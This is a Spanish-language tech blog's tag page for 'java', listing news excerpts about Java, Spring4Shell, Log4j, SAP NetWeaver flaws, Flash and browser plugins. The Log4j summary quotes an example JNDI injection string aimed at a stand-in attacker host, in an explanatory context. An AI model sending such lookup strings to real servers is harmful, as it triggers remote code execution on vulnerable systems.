Tutoriales y Manuales
Entradas Mensuales
-
▼
2025
(Total:
1838
)
-
▼
diciembre
(Total:
176
)
-
Eliminarán los métodos de validación de dominio me...
-
Vulnerabilidad crítica de Plesk da acceso root
-
Si no quieres que tu propio Smart TV te espíe tien...
-
¿Qué es 'camfecting'?
-
iRobot (Roomba) se declara en bancarrota
-
Socket 5: cuando las placas base soportaban CPUs I...
-
La generación Z usa Find My de Apple para comparti...
-
Samsung se prepara para detener la producción de S...
-
Grok pierde el control en los Tesla integrados par...
-
Cristales de memoria en 5D prometen resistencia pa...
-
Ratas entrenadas para jugar Doom ya disparan enemigos
-
Australia bloquea el acceso a redes sociales a men...
-
Google mejora Gemini con conversaciones más fluida...
-
WhatsApp obliga a usuarios de Windows 11 a actuali...
-
Fraude cripto de más de 40 mil millones de dólares...
-
Diez errores frecuentes al montar un PC que debes ...
-
Fabricantes de smartphone volverán a configuracion...
-
Se filtran los juegos gratis por Navidad de Epic G...
-
OpenAI firma un acuerdo con Disney para poder gene...
-
Dell prepara subidas masivas de precios de hasta e...
-
La lista IPTV más top con más de 42.000 canales de...
-
Gemini mejora sus respuestas con Google Maps
-
Satoshi desapareció hace 15 años, su identidad sig...
-
Google advierte sobre grupos explotando React2Shel...
-
ShaniOS es una distro Linux inmutable: es muy senc...
-
Nicolás Maduro promete que fabricará chips de NVID...
-
Intel Arrow Lake-S Refresh se deja ver: Core Ultra...
-
YouTube lanza su mayor rediseño en años para el re...
-
Filtración masiva expone 4.300 millones de perfile...
-
Cuidado con lo que descargas: la última de DiCapri...
-
Parece un pendrive, pero es un SSD externo sin cab...
-
AMD, Intel y TI, "comerciantes de muerte", según a...
-
Half-Life 3 es real: fecha de lanzamiento y requis...
-
Bots de IA lanzando ciberataques 24/7: no duermen,...
-
Google Translate ahora utiliza la IA Gemini para i...
-
Alemania llama a consultas al embajador ruso por c...
-
Oracle retrasa centros de datos de OpenAI por esca...
-
El nuevo roter WiFi 7 de Huawei Mesh X3 Pro: 3.6 G...
-
DeepSeek habría entrenado su nueva IA con servidor...
-
Pillan a funcionarios chinos usando fotocopias par...
-
Empire 6.3.0: Novedades para Red Teams y pentesters.
-
Los 10 comandos de PowerShell para empezar en Windows
-
Apple corrige dos zero-day usados en ataques "extr...
-
Nouveau frente a NVIDIA R580 desde GTX 980 hasta l...
-
Comparación de privacidad de ChatGPT, Gemini, Perp...
-
El nuevo router de bolsillo Firewalla Orange con W...
-
Nuevo kit de phishing BlackForce roba credenciales...
-
España pone fecha de caducidad al spam teléfonico
-
Kali Linux 2025.4: 3 nuevas herramientas de hackin...
-
Nintendo pierde 14.000 millones de dólares en capi...
-
OpenAI no escatima en elogios hacia el nuevo GPT-5...
-
The Game Awards: un GOTY esperado, otros ganadores...
-
La NASA pierde el contacto con la sonda MAVEN de M...
-
MITRE publica las 25 vulnerabilidades de software ...
-
ChatGPT 5.2 vs Gemini 3 vs Claude 4.5: qué IA es m...
-
Nuevas vulnerabilidades en React Server Components
-
ChatGPT tendrá un modo para adultos en 2026
-
Formas de grabar la pantalla del PC y editar el ví...
-
Parece una tarjeta MicroSD, pero es el nuevo Mini ...
-
Hispasat acaba con el sueño de convertirse en el S...
-
Google presentará sus primeras gafas inteligentes ...
-
El estado alemán de Schleswig-Holstein prevé un ah...
-
Intel dará prioridad a Panther Lake y Nova Lake pa...
-
Vulnerabilidad de Notepad++ permite instalar malware
-
Android añade función de emergencia mediante vídeo
-
China excluye a NVIDIA de su lista oficial de prov...
-
Meses de caos en la comunidad Linux: Rust gana a C...
-
Disney acusa a Google de infringir los derechos de...
-
Intel no logra anular multa antimonopolio de la UE
-
Sony quiere que una IA permita al usuario censurar...
-
Microsoft quiere impulsar a Xbox gracias a recuper...
-
OpenAI presenta GPT-5.2, su nuevo modelo en en res...
-
Nuevas vulnerabilidades .NET "SOAPwn" exponen disp...
-
Candidato de doctorado de UC Berkeley sabotea el P...
-
Vulnerabilidades críticas en Fortinet, Ivanti, SAP
-
Cómo recuperar equipos antiguos con Google ChromeO...
-
Las tarjetas gráficas subirán de precio en enero d...
-
2 chinos formados por Cisco lideran sofisticados a...
-
Nueva vulnerabilidad crítica en Google Chrome está...
-
Google se expone a una nueva multa europea "potenc...
-
Cuidado con los anuncios falsos en Google que simu...
-
DroidLock es un ransomware que secuestra tu móvil
-
19 extensiones maliciosas para VS Code disfrazadas...
-
RemoveWindowsAI es un script que deshabilita las f...
-
El Pentágono afirma que su nueva IA militar con Ge...
-
Photoshop y Acrobat llegan a ChatGPT: edita tus fo...
-
Instagram permitirá ajustar el uso de la IA en el ...
-
Google Gemini controlará la seguridad de Chrome
-
Consejos de seguridad para proteger WhatsApp
-
AMD presenta FSR Redstone, tecnología de escalado ...
-
Nvidia rastrea GPUs con software para evitar el co...
-
Google Fotos mejora el editor de vídeos con nuevas...
-
Todas las consolas PS5 van a necesitar mantenimien...
-
Actualizaciones de seguridad de diciembre para Mic...
-
Mistral presenta el nuevo modelo LLM Devstral 2
-
Nvidia Cuda nació gracias a Quake III
-
China muestra su ejército de robots humanoides en ...
-
OpenAI, Anthropic y Google se alían con la Linux F...
-
El proyecto Star Trek o cómo Apple quiso crear un ...
-
El detenido N4t0x, un joven de 19 años “que se abu...
-
- ► septiembre (Total: 148 )
-
▼
diciembre
(Total:
176
)
-
►
2024
(Total:
1110
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Síguenos en:
Mostrando entradas con la etiqueta java. Mostrar todas las entradas
Mostrando entradas con la etiqueta java. Mostrar todas las entradas
Python supera Java en popularidad
Python ha superado a Java en popularidad, algo que Java logró hace 24 años, impulsado por la inteligencia artificial y se espera que en 2025 C# quede atrás.
MacOS 14.4 causa el caos, los programas se cierran, no funciona Java y se borran archivos de iCloud
Pocos días después de recibir una nueva versión actualizada de macOS Sonoma, los usuarios de máquinas basadas en Apple Silicon están experimentando problemas generalizados con el software y los servicios en la nube, incluyendo applets Java y aplicaciones que ya no se ejecutan correctamente.
Spring4Shell: un nuevo 0-day en Spring (Java)
Recientemente, un miembro del grupo KnownSec con nick p1n93r publicó un pantallazo en su cuenta de Twitter que mostraba un RCE explotado trivialmente contra el core de Spring (no confundir con otra en Spring Cloud - CVE-2022-22963), ya sabéis, uno de los frameworks en Java más populares en Internet.
Resumen de todas las vulnerabilidades de Log4j
Las versiones de Log4j anteriores a 2.16.0 están sujetas a una vulnerabilidad de ejecución remota de código a través del analizador ldap JNDI. El resumen de la vulnerabilidad anterior es que un servidor que utilice la librería de java vulnerable, cuando reciba una petición en alguno de los campos que necesitaría tratar (el User-Agent en este caso), parsearía el contenido (${variable} => ${jndi:ldap://evil.xa/x}), entraría log4j para su tratamiento, realizaría la query ldap hacia el destino (evil.xa) y éste le respondería con la clase maliciosa ejecutando el código existente en la misma.
Vulnerabilidad crítica en Apache Log4j bautizada como Log4Shell afecta incluso a Minecraft
Una vulnerabilidad zero-day recientemente descubierta en la biblioteca de registro de Java Apache Log4j, ampliamente utilizada (iCloud, Steam, incluso expotable en el chat de Minecraft), es muy fácil de explotar y permite a los atacantes obtener el control total de los servidores afectados. La vulnerabilidad, clasificada como CVE-2021-44228, es muy grave ya que permite la ejecución remota de código sin autenticación cuando el usuario que ejecuta la aplicación utiliza la biblioteca de registro de Java. Afecta Apache Struts2, Apache Solr, Apache Druid, Apache Flink.
Grave fallo en SAP NetWeaver permite secuestrar y robar información
El error, CVE-2020-6287 aka RECON, es una falta de autenticación adecuada en
NetWeaver. Esto permite a los usuarios no autorizados crear nuevas
cuentas de administración a través de HTTP, concediendo a los
malhechores un acceso completo: está clasificado 10 de 10 en términos de
gravedad. El vulnerable componente de Java se utiliza en gran parte de la
línea de productos de SAP, por lo que sería una buena idea comprobar las
actualizaciones de cualquier código SAP que se ejecute en su red. Una explotación exitosa de RECON podría dar a un atacante no autenticado acceso completo al sistema SAP afectado. Esto incluye la capacidad de modificar registros financieros, robar información de identificación personal (PII) de empleados, clientes y proveedores, corromper datos, eliminar o modificar registros
jSQL Injection: herramienta automatizada en Java para realizar ataques inyección SQL
jSQL Injection es una aplicación Java para realizar ataques automátizados, es decir la inyección automática en bases de datos SQL. Es gratuita, de código abierto y multiplataforma (Windows, Linux, Mac OS X). Otras herramientas similares son SQLMap o de la desaparecida Havij de ITSecTeam.
La FTC sentencia que Oracle tendrá que advertir de los peligros de Java en su propia web
Oracle lleva tiempo teniendo que ponerse las pilas actualizando sus
múltiples productos debido a numerosos fallos de seguridad. Estos fallos
son especialmente peligrosos en plataformas tan extendidas como Java,
razón por la que no sólo es importante mantenerla actualizada, sino
también asegurarse de eliminar las versiones anteriores para no quedar
expuestos a sus vulnerabilidades.
Speedtest publica su test de velocidad sin Flash
Por fin puedes usar otro test de velocidad sin Flash. Speedtest por fin ha publicado su test de velocidad sin Flash,
confirmando que pronto podremos decir adiós con la manita a esta infame
tecnología.
Actualizaciones de seguridad para Microsoft y Adobe Flash Player
Adobe ha publicado hoy una nueva actualización para sellar los agujeros de seguridad de casi tres docenas en su software Flash Player. Microsoft también lanzó 14 paquetes de parches, incluyendo un gran número de correcciones para los equipos con su nuevo sistema operativo Windows 10. Para no quedarse fuera del martes de parches, el director de seguridad de Oracle arrojó una granada de mano de conversación en la comunidad de investigadores de seguridad, que respondió de la misma y provocó Oracle a dar marcha atrás ....
Etiquetas:
actualizaciones
,
actualizar
,
adobe flash player
,
bug
,
flash
,
flash player
,
java
,
microsoft
,
oracle
,
parches
,
seguridad
,
Windows
,
windows 10
|
0
comentarios
Cómo activar el Click to Play de Adobe Flash Player en los navegadores
Podemos activar fácilmente el Click-to-play (Click para activar) el conocido plugin de Adobe Flash Player para todos los navegadores. Lo mismo para el resto de plugins potencialmente vulnerables como el de Oracle Java, la máquina Virtual de Java (si es que realmente lo necesitamos). Incluso el nuevo CEO de Facebook (Alex Stamos) aboga por su muerte. Bienvenidos sean los vídeos en HTML5.
Etiquetas:
adobe
,
adobe flash player
,
complementos
,
firefox
,
flash
,
flash player
,
html5
,
ie
,
java
,
mozilla
,
navegadores
,
opera
,
oracle
,
plugin
,
plugins
,
seguridad
|
0
comentarios
¿Java dejará de funcionar en Google Chrome?
Según la web de Java, el sistema NPAPI quedaría discontinuado con Google Chrome a finales de 2015. Java, Silverlight, entre otros, utilizan la arquitectura NPAPI para
cargar su plugin desde el navegador. NPAPI (Netscape Plugin Application
Programming Interface) es una arquitectura de plugins utilizada por
muchos navegadores.
Java deja atrás la barra de Ask al ser considerada malware por Microsoft pero ahora pedirá instalar el buscador de Yahoo
Java de Oracle, tristemente célebre en el pasado por integrar la barra (toolbar) de Ask como parte de sus proceso de instalación y actualización, ha sido abandonado ahora a favor del motor de búsqueda de Yahoo.
No habrá más actualizaciones de seguridad para Java 7
Los usuarios de Oracle Java 7 no tendrán más actualizaciones de seguridad a partir de abril 2015, a menos que se concluya un acuerdo especial. Esto conlleva el riesgo de un gran número de usuarios de tener una versión no compatible, a menos que se actualicen a Java 8.
Etiquetas:
java
,
java 7
,
novedades
,
software
,
soporte
,
updates
,
Windows
,
windows xp
|
0
comentarios
Vulnerabilidad en Wi-Fi Direct de Android permite reiniciar el dispositivo
Investigadores de seguridad de Core Security han decidido publicar una vulnerabilidad en Wi-Fi Direct Android que permite denegación de servicio DoS, ya que después de avisar al equipo de seguridad de Android, han obtenido como respuesta que la vulnerabilidad es de baja gravedad y por ello no tiene previsto fecha para el parche.
Etiquetas:
advisory
,
android
,
google
,
java
,
poc
,
seguridad
,
vulnerabilidad
,
Wifi
,
wifi direct
|
0
comentarios
Los usuarios de Windows XP no podrán instalar Java 8
Con fecha de 8 de abril de 2014, Microsoft ha discontinuado Windows XP, con lo que ya no es una plataforma soportada. Los
usuarios de XP no podrán instalar Java 8. Los usuarios de Windows deben
actualizar a Windows Vista o versión posterior para poder instalar Java
8.
Java dejará de estar activo en Mozilla Firefox y Google Chrome
En los últimos tiempos, Java ha sido la puerta de entrada de ataques informáticos a muchas de las grandes empresas del sector, por no hablar de ataques ‘0-day’ en los que se descubrían enormes agujeros de seguridad tras realizarse actualizaciones del Java Runtime Enviroment.
Apple y Mozilla dicen (por el momento): "No a Java" (Actualizada, ya hay parche)
Apple y Mozilla han decidido de momento deshabilitar el plugin de Java en los navegadores (en un hecho sin precedentes) para evitar males mayores hasta que se encuentre una solución real al problema de la última grave vulnerabilidad
¿Qué es Java? ¿Para qué sirve? ¿Debo actualizarlo?
Según la web oficial de Oracle y su documentación original:
Java es un lenguaje de programación y la primera plataforma informática creada por Sun Microsystems en 1995. Es la tecnología subyacente que permite el uso de programas punteros, como herramientas, juegos y aplicaciones de negocios. Java se ejecuta en más de 850 millones de ordenadores personales de todo el mundo y en miles de millones de dispositivos, como dispositivos móviles y aparatos de televisión.
Fuente:
http://www.java.com/es/download/faq/whatis_java.xml
¿Qué es la tecnología Java y por qué lo necesito?
Java es un lenguaje de programación y la primera plataforma informática creada por Sun Microsystems en 1995. Es la tecnología subyacente que permite el uso de programas punteros, como herramientas, juegos y aplicaciones de negocios. Java se ejecuta en más de 850 millones de ordenadores personales de todo el mundo y en miles de millones de dispositivos, como dispositivos móviles y aparatos de televisión.
¿Por qué necesito Java?
Existe un gran número de aplicaciones y sitios Web que no funcionan a menos que Java esté instalado, y muchas más que se crean a diario. Java es rápido, seguro y fiable. De portátiles a centros de datos, de consolas de juegos a superequipos científicos, de teléfonos móviles a Internet, Java está en todas partes.¿Java se puede descargar de forma gratuita?
Sí, Java se puede descargar de forma gratuita.¿Por qué debo actualizar a la última versión de Java?
La última versión de Java contiene importantes mejoras para el rendimiento, estabilidad y seguridad de las aplicaciones Java que se ejecutan en su equipo. La instalación de la actualización gratuita garantiza que sus aplicaciones Java sigan ejecutándose de forma segura y eficaz.Fuente:
http://www.java.com/es/download/faq/whatis_java.xml
